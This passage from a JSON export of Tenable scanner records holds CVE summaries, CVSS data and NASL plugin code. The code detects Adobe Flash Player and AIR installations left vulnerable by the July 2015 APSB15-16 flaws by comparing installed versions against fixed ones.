or later.\n\nAlternatively, Adobe has made version 13.0.0.302 available for those\ninstallations that cannot be upgraded to 18.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 18.0.0.194\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.194\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 13.0.0.296\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"13.0.0.296\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 14-18 <= 18.0.0.194\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^1[4-8]\\.\" &&\n ver_compare(ver:ver,fix:\"18.0.0.194\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - 
(\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : NPAPI Browser plugin (for Firefox / Netscape / Opera)';\n fix = \"18.0.0.203 / 13.0.0.302\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"18.0.0.203 / 13.0.0.302\";\n }\n else if (variant == \"Chrome\")\n {\n info += '\\n Product : Browser plugin (for Google Chrome)';\n fix = \"Upgrade to the latest version of Google Chrome.\";\n }\n else if (variant == \"Chrome_Pepper\")\n {\n info += '\\n Product : PPAPI Browser plugin (for Opera and Chromium)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 18.0.0.203 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:19:02", "description": "According to its version, the installation of Adobe AIR on the remote Mac OS X host is equal or prior to 18.0.0.144. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. 
(CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. 
(CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "Adobe AIR for Mac <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84643", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84643);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n 
\"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR for Mac <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. 
(CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 18.0.0.180 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '18.0.0.144';\nfixed_version_for_report = '18.0.0.180';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:19:03", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is equal or prior to version 18.0.0.194. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. 
(CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. 
(CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84644", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84644);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n 
\"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16) (Mac OS X)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 18.0.0.194. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. 
(CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 18.0.0.203 or later.\n\nAlternatively, Adobe has made version 13.0.0.302 available for those\ninstallations that cannot be upgraded to 18.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"18.0.0.194\";\n fix = \"18.0.0.203\";\n}\nelse\n{\n cutoff_version = \"13.0.0.296\";\n fix = \"13.0.0.302\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:23", "description": "The version of Google Chrome on the remote host is prior to 43.0.2357.132 and is affected by the following vulnerabilities in the Adobe Flash player component :\n\n - An information disclosure vulnerability 
exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097) \n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118) \n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431) \n - Multiple NULL pointer dereference flaws exist. (CVE-2015-3126, CVE-2015-4429) \n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114) \n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433) \n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119) \n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116) \n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. 
(CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-09-25T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5124", "CVE-2015-3097"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "8881.PASL", "href": "https://www.tenable.com/plugins/nnm/8881", "sourceData": "Binary data 8881.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:56", "description": "Versions of Adobe Flash Player prior to 18.0.0.203 are outdated and thus unpatched for the following vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n - Multiple NULL pointer dereference flaws exist. (CVE-2015-3126, CVE-2015-4429)\n - A security bypass vulnerability exists that results in an information disclosure. 
(CVE-2015-3114)\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-07-24T00:00:00", "type": "nessus", "title": "Flash Player < 13.0.0.302 / 18.0.0.203 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5124", "CVE-2015-3097"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "8821.PRM", "href": "https://www.tenable.com/plugins/nnm/8821", "sourceData": "Binary data 8821.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
